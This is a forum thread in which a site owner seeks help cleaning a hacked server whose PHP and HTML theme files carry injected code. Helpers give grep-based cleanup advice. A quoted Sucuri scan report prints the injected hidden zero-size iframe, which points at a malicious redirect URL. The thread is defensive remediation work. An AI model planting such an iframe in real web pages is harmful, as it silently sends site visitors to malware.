    ./tmp/rt_grunge_j15/admin/index.html
    ./tmp/rt_grunge_j15/admin/presets/index.html
    ./tmp/rt_grunge_j15/features/index.html
    ./tmp/rt_grunge_j15/profile.php
    ./tmp/rt_grunge_j15/html/mod_poll/index.html
    ./tmp/rt_grunge_j15/html/mod_login/index.html
    ./tmp/rt_grunge_j15/html/mod_breadcrumbs/index.html
    ./tmp/rt_grunge_j15/html/mod_newsflash/index.html
    ./tmp/rt_grunge_j15/html/com_weblinks/categories/index.html
    ./tmp/rt_grunge_j15/html/com_weblinks/index.html
    ./tmp/rt_grunge_j15/html/com_weblinks/weblink/index.html
    ./tmp/rt_grunge_j15/html/com_weblinks/category/index.html
    ./tmp/rt_grunge_j15/html/com_contact/contact/index.html
    ./tmp/rt_grunge_j15/html/com_contact/category/index.html
    ./tmp/rt_grunge_j15/html/index.html
    ./tmp/rt_grunge_j15/html/com_poll/poll/index.html
    ./tmp/rt_grunge_j15/html/com_poll/index.html
    ./tmp/rt_grunge_j15/html/com_newsfeeds/newsfeed/index.html
    ./tmp/rt_grunge_j15/html/com_newsfeeds/categories/index.html
    ./tmp/rt_grunge_j15/html/com_newsfeeds/index.html
    ./tmp/rt_grunge_j15/html/com_newsfeeds/category/index.html
    ./tmp/rt_grunge_j15/html/com_content/section/section/index.html
    ./tmp/rt_grunge_j15/html/com_content/section/index.html
    ./tmp/rt_grunge_j15/html/com_content/article/index.html
    ./tmp/rt_grunge_j15/html/com_content/index.html
    ./tmp/rt_grunge_j15/html/com_content/frontpage/index.html
    ./tmp/rt_grunge_j15/html/com_content/category/index.html
    ./tmp/rt_grunge_j15/html/com_content/category/category/index.html
    ./tmp/rt_grunge_j15/html/com_rokcandy/index.html
    ./tmp/error.php
    ./tmp/js_education_blu_wht/js/index.html
    ./tmp/js_education_blu_wht/css/index.html
    ./tmp/js_education_blu_wht/index.php
    ./tmp/js_education_red_gld/js/index.html
    ./tmp/js_education_red_gld/css/index.html
    ./tmp/js_education_red_gld/index.php
    ./tmp/js_education/js/index.html
    ./tmp/js_education/css/index.html
    ./tmp/js_education/index.php
    ./tmp/html/mod_poll/index.html
    ./tmp/html/mod_login/index.html
    ./tmp/html/mod_newsflash/index.html
    ./tmp/html/com_weblinks/categories/index.html
    ./tmp/html/com_weblinks/index.html
    ./tmp/html/com_weblinks/category/index.html
    ./tmp/html/com_contact/contact/index.html
    ./tmp/html/com_contact/index.html
    ./tmp/html/com_contact/category/index.html
    ./tmp/html/mod_latestnews/index.html
    ./tmp/html/com_search/search/index.html
    ./tmp/html/com_search/index.html
    ./tmp/html/mod_footer/index.html
    ./tmp/html/com_user/reset/index.html
    ./tmp/html/com_user/user/index.html
    ./tmp/html/com_user/login/index.html
    ./tmp/html/com_user/index.html
    ./tmp/html/com_user/remind/index.html
    ./tmp/html/com_user/register/index.html
    ./tmp/html/mod_search/index.html
    ./tmp/html/index.html
    ./tmp/html/com_poll/poll/index.html
    ./tmp/html/com_poll/index.html
    ./tmp/html/mod_banners/index.html
    ./tmp/html/mod_syndicate/index.html
    ./tmp/html/com_newsfeeds/newsfeed/index.html
    ./tmp/html/com_newsfeeds/categories/index.html
    ./tmp/html/com_newsfeeds/index.html
    ./tmp/html/com_newsfeeds/category/index.html
    ./tmp/html/com_content/section/index.html
    ./tmp/html/com_content/article/index.html
    ./tmp/html/com_content/index.html
    ./tmp/html/com_content/frontpage/index.html
    ./tmp/html/com_content/category/index.html
    ./theblog/wp-content/themes/7730jm-photo/images/index.html
    ./theblog/wp-content/themes/7730jm-photo/component.php
    ./theblog/wp-content/themes/7730jm-photo/css/index.html
    ./theblog/wp-content/themes/7730jm-photo/index.html
    ./theblog/wp-content/themes/7730jm-photo/index.php
    ./theblog/wp-content/themes/7730jm-photo/html/mod_login/index.html
    ./theblog/wp-content/themes/7730jm-photo/html/mod_footer/index.html
    ./theblog/wp-content/themes/7730jm-photo/html/mod_search/index.html
    ./theblog/wp-content/themes/7730jm-photo/html/index.html
    ./theblog/wp-content/themes/7730jm-photo/html/mod_banners/index.html
    ./page1/themes/bluemarine/page.tpl.php
    ./page1/themes/garland/maintenance-page.tpl.php
    ./page1/themes/garland/page.tpl.php
    ./page1/themes/pushbutton/page.tpl.php
    ./page1/modules/book/book-export-html.tpl.php
    ./page1/modules/system/maintenance-page.tpl.php
    ./page1/modules/system/page.tpl.php
    .................................................. ..........................





    Quote Originally Posted by Irithori View Post
    Search&replace is hard, if neither the current infected nor previous good state is given..
    I tried to find technical background information about what "perevod" actually changes, especially if really only webfiles (.html, .js, etc) are affected.
    But apart from pointers to some obscure russian sites, I couldnt find anything.

    As you and the techs looked at the hack: Can you tell and print in total what has been inserted?
    For obvious reasons, please make sure that links to malicious sites are not pasted verbatim here.
    Also please use code tags.
    Attached Files Attached Files

  9. #8
    Linux Engineer
    Join Date
    Apr 2012
    Location
    Virginia, USA
    Posts
    917
    Quote Originally Posted by bailenforcer View Post
    I need to know how to write a find and replace to remove this problem as all the 400.shtml files are also infected, this infection is so pervasive it has even infected themes and you name it. So short of destroying years of work, and site information, I need to try a script to avoid the loss of several years of running 3 sites.

    Does anyone have enough knowledge to advise me how to write such a script?
    So, a lot of times when a server gets hacked the DBs are infected too. You'll have to manually scrub your DBs as well as change their passwords.

    Anyway, best way I can think of is go to each directory and subdirectory and run the following (after stopping the webserver):
    grep -i iframe *
    That will search each file in the directory for an instance of "iframe"
    The output of the command will be something like:
    filename1: <iframe> blahblahblah
    filename2: blha <ifRamE>blah blah blah

    You get it.

    Also change the admin login pw's for your website's admin login area, if applicable.

    Also, I would run the same steps with
    grep -i script *
    and manually review each and every instance of a script reference. Lots of times there are off site java scripts embedded in each of the files.

    After you have cleaned up your files (don't forget important config files such as httpd.conf / apache2.conf), archive them, scan them for viruses. Do the same with the DBs. Next, have your VM/VPS reinstalled fresh, and restore your files. This will prevent any tampered system files from performing as a root kit.

  10. #9
    Just Joined!
    Join Date
    Feb 2013
    Posts
    5
    The passwords were changed the second we knew there was an issue.

    Here is a report from securi check.. I am not allowed to enter a url so I removed the http and added xxxx in place of it.

    Known javascript malware.
    Details:sucurinet/malware/malware-entry-mwiframeenc1560
    <iframe src="xxxx://perevod.me/sts/sTDS/go.php?sid=1" width="0" height="0" frameborder="0"></iframe></body>

    Hidden Iframes.
    Details: sucurinet/malware/entry/MW:IFRAME:HD202
    <iframe src="xxxx://perevod.me/sts/sTDS/go.php?sid=1" width="0" height="0" frameborder="0">







    Quote Originally Posted by mizzle View Post
    So, a lot of times when a server gets hacked the DBs are infected too. You'll have to manually scrub your DBs as well as change their passwords.

    Anyway, best way I can think of is go to each directory and subdirectory and run the following (after stopping the webserver):
    grep -i iframe *
    That will search each file in the directory for an instance of "iframe"
    The output of the command will be something like:
    filename1: <iframe> blahblahblah
    filename2: blha <ifRamE>blah blah blah

    You get it.

    Also change the admin login pw's for your website's admin login area, if applicable.

    Also, I would run the same steps with
    grep -i script *
    and manually review each and every instance of a script reference. Lots of times there are off site java scripts embedded in each of the files.

    After you have cleaned up your files (don't forget important config files such as httpd.conf / apache2.conf), archive them, scan them for viruses. Do the same with the DBs. Next, have your VM/VPS reinstalled fresh, and restore your files. This will prevent any tampered system files from performing as a root kit.

  11. #10
    Linux Engineer
    Join Date
    Apr 2012
    Location
    Virginia, USA
    Posts
    917
    Quote Originally Posted by bailenforcer View Post
    The passwords were changed the second we knew there was an issue.

    Here is a report from securi check.. I am not allowed to enter a url so I removed the http and added xxxx in place of it.

    Known javascript malware.
    Details:sucurinet/malware/malware-entry-mwiframeenc1560
    <iframe src="xxxx://perevod.me/sts/sTDS/go.php?sid=1" width="0" height="0" frameborder="0"></iframe></body>

    Hidden Iframes.
    Details: sucurinet/malware/entry/MW:IFRAME:HD202
    <iframe src="xxxx://perevod.me/sts/sTDS/go.php?sid=1" width="0" height="0" frameborder="0">
    I gave you the instructions to find the infected files and the other necessary steps.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •